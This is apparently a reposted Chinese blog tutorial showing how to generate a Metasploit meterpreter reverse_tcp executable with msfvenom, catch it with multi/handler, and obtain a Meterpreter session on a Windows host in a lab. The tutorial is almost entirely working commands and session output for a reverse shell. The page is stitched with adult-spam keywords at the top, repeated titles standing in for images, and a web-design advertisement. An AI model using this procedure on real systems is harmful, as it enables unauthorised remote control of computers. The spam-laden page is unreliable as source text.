欧美一区二区三区老妇人-欧美做爰猛烈大尺度电-99久久夜色精品国产亚洲a-亚洲福利视频一区二区

Kali下Metasploit的shellcode在windows中的使用

網(wǎng)絡(luò)拓?fù)洌?/strong>
Kali下Metasploit的shellcode在windows中的使用
kaili系統(tǒng)版本:
Kali下Metasploit的shellcode在windows中的使用
注:前面的版本在生成shellcode的時候用的是msfpayload命令

創(chuàng)新互聯(lián)建站專注于企業(yè)成都全網(wǎng)營銷推廣、網(wǎng)站重做改版、崇義網(wǎng)站定制設(shè)計、自適應(yīng)品牌網(wǎng)站建設(shè)、H5建站商城系統(tǒng)網(wǎng)站開發(fā)、集團(tuán)公司官網(wǎng)建設(shè)、成都外貿(mào)網(wǎng)站制作、高端網(wǎng)站制作、響應(yīng)式網(wǎng)頁設(shè)計等建站業(yè)務(wù),價格優(yōu)惠性價比高,為崇義等各大城市提供網(wǎng)站開發(fā)制作服務(wù)。

1.kaili生成shellcode:
root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.偵聽shellcode:

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit 
[*] Started reverse TCP handler on 192.168.152.131:1211 

3.將生成的sehllcode上傳至windows主機(jī)中并運行:
Kali下Metasploit的shellcode在windows中的使用

4.已經(jīng)有session返回

msf exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.152.131:1211 

[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000

5.成功拿到shell:
Kali下Metasploit的shellcode在windows中的使用

分享文章:Kali下Metasploit的shellcode在windows中的使用
網(wǎng)頁地址:http://chinadenli.net/article36/ggpgpg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供全網(wǎng)營銷推廣網(wǎng)站制作企業(yè)網(wǎng)站制作網(wǎng)站維護(hù)App設(shè)計用戶體驗

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)